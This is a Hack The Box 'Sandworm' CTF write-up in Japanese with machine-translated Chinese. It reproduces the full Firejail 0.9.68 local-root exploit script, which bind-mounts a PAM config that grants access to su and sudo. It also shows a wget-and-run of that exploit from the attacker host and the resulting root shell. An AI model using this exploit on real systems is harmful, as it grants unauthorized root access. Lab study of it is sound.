この記事からPythonファイルを取得し実行してみる。
从本文中获取 Python 文件并运行它。

atlas@sandworm:~$ wget http://10.10.14.114/firejoin_py.bin
wget http://10.10.14.114/firejoin_py.bin
--2023-06-21 15:34:32--  http://10.10.14.114/firejoin_py.bin
Connecting to 10.10.14.114:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8651 (8.4K) [application/octet-stream]
Saving to: ‘firejoin_py.bin’

     0K ........                                              100% 14.6M=0.001s

2023-06-21 15:34:33 (14.6 MB/s) - ‘firejoin_py.bin’ saved [8651/8651]

atlas@sandworm:~$ chmod +x firejoin_py.bin
chmod +x firejoin_py.bin
atlas@sandworm:~$ ./firejoin_py.bin
./firejoin_py.bin

ん??なにも起きない… 嗯?? 什么也没发生……
何故?

Python Exploit Code Python 漏洞利用代码

real file 真实文件

Pythonの中身を確認してみる。 让我们检查一下 Python 的内容。

firejoin.py
#!/usr/bin/python3

# Author: Matthias Gerstner <matthias.gerstner () suse com>
#
# Proof of concept local root exploit for a vulnerability in Firejail 0.9.68
# in joining Firejail instances.
#
# Prerequisites:
# - the firejail setuid-root binary needs to be installed and accessible to the
#   invoking user
#
# Exploit: The exploit tricks the Firejail setuid-root program to join a fake
# Firejail instance. By using tmpfs mounts and symlinks in the unprivileged
# user namespace of the fake Firejail instance the result will be a shell that
# lives in an attacker controller mount namespace while the user namespace is
# still the initial user namespace and the nonewprivs setting is unset,
# allowing to escalate privileges via su or sudo.

import os
import shutil
import stat
import subprocess
import sys
import tempfile
import time
from pathlib import Path

# Print error message and exit with status 1
def printe(*args, **kwargs):
    kwargs['file'] = sys.stderr
    print(*args, **kwargs)
    sys.exit(1)

# Return a boolean whether the given file path fulfils the requirements for the
# exploit to succeed:
# - owned by uid 0
# - size of 1 byte
# - the content is a single '1' ASCII character
def checkFile(f):
    s = os.stat(f)

    if s.st_uid != 0 or s.st_size != 1 or not stat.S_ISREG(s.st_mode):
        return False

    with open(f) as fd:
        ch = fd.read(2)

        if len(ch) != 1 or ch != "1":
            return False

    return True

def mountTmpFS(loc):
    subprocess.check_call("mount -t tmpfs none".split() + [loc])

def bindMount(src, dst):
    subprocess.check_call("mount --bind".split() + [src, dst])

def checkSelfExecutable():
    s = os.stat(__file__)

    if (s.st_mode & stat.S_IXUSR) == 0:
        printe(f"{__file__} needs to have the execute bit set for the exploit to work. Run `chmod +x {__file__}` and try again.")

# This creates a "helper" sandbox that serves the purpose of making available
# a proper "join" file for symlinking to as part of the exploit later on.
#
# Returns a tuple of (proc, join_file), where proc is the running subprocess
# (it needs to continue running until the exploit happened) and join_file is
# the path to the join file to use for the exploit.
def createHelperSandbox():
    # just run a long sleep command in an unsecured sandbox
    proc = subprocess.Popen(
            "firejail --noprofile -- sleep 10d".split(),
            stderr=subprocess.PIPE)

    # read out the child PID from the stderr output of firejail
    while True:
        line = proc.stderr.readline()
        if not line:
            raise Exception("helper sandbox creation failed")

        # on stderr a line of the form "Parent pid <ppid>, child pid <pid>" is output
        line = line.decode('utf8').strip().lower()
        if line.find("child pid") == -1:
            continue

        child_pid = line.split()[-1]

        try:
            child_pid = int(child_pid)
            break
        except Exception:
            raise Exception("failed to determine child pid from helper sandbox")

    # We need to find the child process of the child PID, this is the
    # actual sleep process that has an accessible root filesystem in /proc
    children = f"/proc/{child_pid}/task/{child_pid}/children"

    # If we are too quick then the child does not exist yet, so sleep a bit
    for _ in range(10):
        with open(children) as cfd:
            line = cfd.read().strip()
            kids = line.split()
            if not kids:
                time.sleep(0.5)
                continue
            elif len(kids) != 1:
                raise Exception(f"failed to determine sleep child PID from helper sandbox: {kids}")

            try:
                sleep_pid = int(kids[0])
                break
            except Exception:
                raise Exception("failed to determine sleep child PID from helper sandbox")
    else:
        raise Exception(f"sleep child process did not come into existence in {children}")

    join_file = f"/proc/{sleep_pid}/root/run/firejail/mnt/join"
    if not os.path.exists(join_file):
        raise Exception(f"join file from helper sandbox unexpectedly not found at {join_file}")

    return proc, join_file

# Re-executes the current script with unshared user and mount namespaces
def reexecUnshared(join_file):

    if not checkFile(join_file):
        printe(f"{join_file}: this file does not match the requirements (owner uid 0, size 1 byte, content '1')")

    os.environ["FIREJOIN_JOINFILE"] = join_file
    os.environ["FIREJOIN_UNSHARED"] = "1"

    unshare = shutil.which("unshare")
    if not unshare:
        printe("could not find 'unshare' program")

    cmdline = "unshare -U -r -m".split()
    cmdline += [__file__]

    # Re-execute this script with unshared user and mount namespaces
    subprocess.call(cmdline)

if "FIREJOIN_UNSHARED" not in os.environ:
    # First stage of execution, we first need to fork off a helper sandbox and
    # an exploit environment
    checkSelfExecutable()
    helper_proc, join_file = createHelperSandbox()
    reexecUnshared(join_file)

    helper_proc.kill()
    helper_proc.wait()
    sys.exit(0)
else:
    # We are in the sandbox environment, the suitable join file has been
    # forwarded from the first stage via the environment
    join_file = os.environ["FIREJOIN_JOINFILE"]

# We will make /proc/1/ns/user point to this via a symlink
time_ns_src = "/proc/self/ns/time"

# Make the firejail state directory writeable, we need to place a symlink to
# the fake join state file there
mountTmpFS("/run/firejail")
# Mount a tmpfs over the proc state directory of the init process, to place a
# symlink to a fake "user" ns there that firejail thinks it is joining
try:
    mountTmpFS("/proc/1")
except subprocess.CalledProcessError:
    # This is a special case for Fedora Linux where SELinux rules prevent us
    # from mounting a tmpfs over proc directories.
    # We can still circumvent this by mounting a tmpfs over all of /proc, but
    # we need to bind-mount a copy of our own time namespace first that we can
    # symlink to.
    with open("/tmp/time", 'w') as _:
        pass
    time_ns_src = "/tmp/time"
    bindMount("/proc/self/ns/time", time_ns_src)
    mountTmpFS("/proc")

FJ_MNT_ROOT = Path("/run/firejail/mnt")

# Create necessary intermediate directories
os.makedirs(FJ_MNT_ROOT)
os.makedirs("/proc/1/ns")

# Firejail expects to find the umask for the "container" here, else it fails
with open(FJ_MNT_ROOT / "umask", 'w') as umask_fd:
    umask_fd.write("022")

# Create the symlink to the join file to pass Firejail's sanity check
os.symlink(join_file, FJ_MNT_ROOT / "join")
# Since we cannot join our own user namespace again fake a user namespace that
# is actually a symlink to our own time namespace. This works since Firejail
# calls setns() without the nstype parameter.
os.symlink(time_ns_src, "/proc/1/ns/user")

# The process joining our fake sandbox will still have normal user privileges,
# but it will be a member of the mount namespace under the control of *this*
# script while *still* being a member of the initial user namespace.
# 'no_new_privs' won't be set since Firejail takes over the settings of the
# target process.
#
# This means we can invoke setuid-root binaries as usual but they will operate
# in a mount namespace under our control. To exploit this we need to adjust
# file system content in a way that a setuid-root binary grants us full
# root privileges. 'su' and 'sudo' are the most typical candidates for it.
#
# The tools are hardened a bit these days and reject certain files if not owned
# by root e.g. /etc/sudoers. There are various directions that could be taken,
# this one works pretty well though: Simply replacing the PAM configuration
# with one that will always grant access.
with tempfile.NamedTemporaryFile('w') as tf:
    tf.write("auth sufficient pam_permit.so\n")
    tf.write("account sufficient pam_unix.so\n")
    tf.write("session sufficient pam_unix.so\n")

    # Be agnostic about the PAM config file location in /etc or /usr/etc
    for pamd in ("/etc/pam.d", "/usr/etc/pam.d"):
        if not os.path.isdir(pamd):
            continue
        for service in ("su", "sudo"):
            service = Path(pamd) / service
            if not service.exists():
                continue
            # Bind mount over new "helpful" PAM config over the original
            bindMount(tf.name, service)

print(f"You can now run 'firejail --join={os.getpid()}' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.")

while True:
    line = sys.stdin.readline()
    if not line:
        break

printされないぞ??firejail --join=??でコマンドを打った後にsu -で権限昇格できそうだが?
它不会被打印出来,对吧? ?? firejail --join=?? 键入命令后是否可以提升 su - 权限?

これがprintされないとProccessがわからん!
如果不打印,我不知道 Proccess!

もう少し読み込んでみる。 我会试着多读一点。

code explanation 代码说明

このファイルは2度実行される… 此文件运行两次…

このExploitの実行の流れはFIREJOIN_UNSHAREDの環境変数の有無で大きく変わってくる。
此漏洞的执行流程因环境变量的存在与否 FIREJOIN_UNSHARED 而有很大差异。

1度目の実行の際はこの環境変数がないのでreexecUnshared関数を実行し、サンドボックスを作成する動作に入る。その際に以下のsubproccessコードを実行し、もう一度このファイルを実行する。
第一次执行时,此环境变量不存在,因此将执行函数 reexecUnshared 并创建沙箱。 此时,执行以下子过程代码并再次执行此文件。

    cmdline = "unshare -U -r -m".split()
    cmdline += [__file__]

    # Re-execute this script with unshared user and mount namespaces
    subprocess.call(cmdline)

その再度実行された際には環境変数が設定されており、あのprintがされるわけだ。
再次执行时,将设置环境变量,并完成打印。

…何かしら2度目の実行が上手くいってない?  … 第二次不是很顺利吗?
ps auxで確認してみる。  ps aux 让我们来看看。
【Hack The Box】Sandworm【Writeup】
あれ、二度目の実行がされている?プロセスがあるぞ?
这是第二次运行吗? 有一个过程,对吧?

???

join execution 联接执行

上記Processが存在するなら試しにfirejail --join=5701su -を別ターミナルで打ってみる。
如果存在上述过程,请尝试在另一个终端中键入 firejail --join=5701 和 su - 键入。

あ、その前に一応PID 5696も間違うよねって観点で打ってみる。
哦,在此之前,让我们试着从错误的角度来打击 PID 5696。

atlas@sandworm:~$ firejail --join=5696
firejail --join=5696
Error: no valid sandbox

そうですよね。予想通り。 是的,这是真的。 不出所料。
じゃぁ本命行きます。  然后我会去最喜欢的。

atlas@sandworm:~$ firejail --join=5701
firejail --join=5701
Warning: cleaning all supplementary groups
changing root to /proc/5701/root
Child process initialized in 9.94 ms
su -
whoami
root

【Hack The Box】Sandworm【Writeup】
いきました!  去!
Printされてなかった理由は恐らくインタラクティブシェルを取ってなかったからだ(´・ω・)
它没有被打印的原因可能是因为我没有带一个交互式外壳( ́・ω・)

まとめ 总结

【Hack The Box】Sandworm【Writeup】
過去一で難しかった。  这是我做过的最困难的事情。
これでmediumは嘘だ!絶対にHardあるでしょ!
那是谎言! 这绝对很难!

脳みそ溶けました(´・ω・)  大脑融化 ( ́・ω・)

今回もセキュリティエンジニアの皆さんの助けになればなと思います。
我希望这次也能帮助安全工程师。

 

原文始发于qiita:【Hack The Box】Sandworm【Writeup】

版权声明:admin 发表于 2023年11月20日 下午3:42。
转载请注明:【Hack The Box】Sandworm【Writeup】 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...